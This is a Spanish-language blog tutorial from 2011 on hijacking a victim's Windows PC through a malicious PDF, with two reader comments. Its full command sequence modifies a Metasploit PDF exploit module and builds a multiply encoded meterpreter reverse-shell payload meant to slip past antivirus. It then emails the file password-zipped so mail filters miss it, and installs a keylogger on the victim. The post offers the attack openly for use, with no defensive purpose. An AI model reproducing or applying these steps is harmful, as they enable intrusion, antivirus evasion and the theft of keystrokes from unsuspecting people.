3 jun 2011

Backdooring en el PDF

Hola a todos, soy streaming10, y hoy nos lo vamos a pasar pirata.

Vamos al grano, hoy voy a intentar explicar cómo mediante ingeniería social y metasploit, vamos a tomar el control de un pc.Ante todo, pido disculpas en caso de errores, quizás haya cosas que se me pasen cosas por alto.

Voy a trabajar con Bactrack 4 R2.

Necesitamos tener instalados en nuestro BT, lo siguiente:

  • sendEmail (BT lo trae, pero por si las moscas no lo tienes) Todo lo deberás ejecutar como ROOT (asique pon el sudo en caso de necesitarlo)
  • #apt-get install sendEmail

también el módulo STARTTLS (sirve para codificar el mensaje de email que mandemos)

  • #apt-get install STARTTLS

también el compresor zip

  • #apt-get install zip

Eso antes de empezar, luego, en este caso nos vamos a servir del exploit de msf3 adobe_pdf_embedded_exeEl problema que tiene este exploit es que sirve para WINDOWS XP SP3 english, y la mayoría de nosotros tiene el windows en spanish (digo yo...), asique cuando intentas correr el payload, él busca en "Desktop", "My Documents", "Documents".

Total, que vamos a tener que modificar un poquitín el exploit.Nos vamos al siguiente directorio

/opt/metasploit3/msf3/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb

y con tu editor abres el archivo (por ejemplo kate)

y en la línea donde pone

dirs = [ "Desktop", "My Documents", "Documents"]

sustituyes y pones

dirs = [ "Desktop", "My Documents", "Documents", "Escritorio", "Mis Documentos", "Documentos" ]

Guardáis y listo. Este paso es extrapolable a otros exploits que solo corran para versiones en inglés, así que quedaros con la copla.

Los comandos que vamos a usar son:

  • #msfupdate (que nos actualizará todos los módulos y exploits que haya en metasploit).

Después de esto comenzamos con la preparación del exploit y payload.

Introducimos en la misma consola los siguientes comandos

  • #msfconsole (lo que nos permitirá arrancar metasploit, tarda un poquito, no desesperes).
  • #search pdf (nos sirve para restringir el campo de nuestra búsqueda a palabras que contengan pdf)
  • #use use windows/fileformat/adobe_pdf_embedded_exe (éste es el exploit, que antes modificamos y que nos sirve para meter un .exe dentro de un archivo pdf) Depende de la versión de nuestro pdf, funcionará el exploit k vaya dentro o no. OJO
  • #info (nos dice los parámetros obligatorios de nuestro xploit, y una breve descripción de él)
  • #show options (pues las opciones)
  • #set EXENAME (aquí colocamos el payload que nos hemos generado, por ejemplo payload_2.exe)
  • #set FILENAME (el nombre del pdf que se nos creará)
  • #set INFILENAME (el nombre del pdf que usaremos para copiar su contenido)
  • #set OUTPUTPATH (el nombre de la ruta de salida del archivo pdf que obtendremos, es decir, a dónde queremos que nos guarde el FILENAME)
  • #set LAUNCH_MESSAGE (mensaje que saldrá en teoría al abrir el pdf malicioso)
  • #msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.30 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 10 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/countdown -c 3 -t raw | msfencode -e x86/call4_dword_xor -c 3 -t exe -o payload_2.exe (el nombre del payload que hemos creado, que a su vez está encriptado, por aquello de los antivirus y tal, intentad no mandarlo a virustotal, porque luego pasan las pruebas a los antivirus, mejor a novirusthanks, graciassss )

*Este payload es totalmente operativo por si mismo, podéis usarlo de forma autónoma para otros exploits, incluso mediante ingeniería social, podéis guardarlo en un USB y ejecutarlo como .exe en el pc víctima, ya cada cuál que se monte el chiringuito como pueda.

  • #msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.30 LPORT=4444 E (nos ejecuta el payload y se pone a la escucha)

Estos son los comandos que debes meter de principio a fin. Abre una consola y pon:

  • msfupdate
  • clear
  • msfconsole
  • msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.30 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 10 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/countdown -c 3 -t raw | msfencode -e x86/call4_dword_xor -c 3 -t exe -o payload_2.exe
  • clear
  • search pdf
  • use windows/fileformat/adobe_pdf_embedded_exe
  • info
  • set EXENAME /root/payload_2.exe
  • set FILENAME soyuncachondo.pdf
  • set INFILENAME /root/elpdfqueusasdebaseparasoyuncachondo.pdf
  • set LAUNCH_MESSAGE Abre el pdf, seguro que te es de ayuda
  • set OUTPUTPATH /root/
  • exploit
  • msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.30 LPORT=4444 E
Ya tenemos escuchando a nuestro reverse_tcp, una vez que la víctima abra su pdf, se creará automáticamente la sesión de meterpreter.Ahora con el archivo pdf que se te ha creado en el escritorio llamado soyuncachondo.pdf lo que vamos a hacer es enviarlo de forma codificada y con contraseña (para que nuestro servidor de correo smtp no pueda detectarlo). Para esto abrimos una shell nueva y ponemos lo siguiente:

Bueno, si todo ha ido bien, abréis mandado el email con un pdf infectado, al abrirlo la víctima, él no notará nada (que para eso lo hemos codificado y encriptado todo lo que hemos mandado, nos lo hemos currao, no?) y solo verá el pdf que le habéis pasado, meterá la contraseña, el pdf se abrirá normal y por debajo se ejecutará el reverse_tcp. Yupiiii.

Vale, una vez iniciada la sesión de meterpreter que hemos mandado, podemos sacarle partido, por ejemplo poniendole un keylogger.

Introduce ahora en la consola de metasploit esto:

  • ps
  • run post/windows/manage/migrate
  • sysinfo
  • use priv
  • run post/windows/capture/keylog_recorder
  • cat /root/.msf3 (aquí ponéis la ruta que en cada caso os de meterpreter en el paso anterior, algo parecido a esto)

Con esto hemos arrancado un keylogger en nuestra víctima.

Fuentes consultadas:

http://webcache.googleusercontent.com/search?q=cache:mFGl_H4AcikJ:www.metasploit-es.com.ar/wiki/index.php/El_ataque_del_lado_del_cliente+crear+pdf+malicioso+con+metasploit&cd=1&hl=es&ct=clnk&gl=es&source=www.google.es

http://www.kungfoosion.com/2010/02/embebiendo-un-ejecutable-dentro-de-un.html

http://g0tmi1k.blogspot.com/2011/03/video-metasploit-vs-adobe-pdfs.html

http://comunidad.dragonjar.org/archive/t-9630.html

http://comunidad.dragonjar.org/archive/t-10401.html

http://www.offensive-security.com/metasploit-unleashed/Client_Side_Attacks

Doy las gracias a todos aquellos que aguantan mis preguntas que seguro saben quienes son, entre ellos juanan, pablo, hecky, zerial.killer, pepeluxx, mi tio alejandro, g0tmi1k  y hackmaf (disculpad si me olvido de alguno, que se de también por felicitado)

Un saludo Streaming10

[youtube vyA2rz2OUc4 nolink]

3 comentarios:

  1. Muy bueno para variar.Un saludo Streaming10

    ResponderEliminar
  2. [...] un amigo sevillano nos explicaba como hacer que un insulso PDF se convierta en la fiesta más pirata del [...]

    ResponderEliminar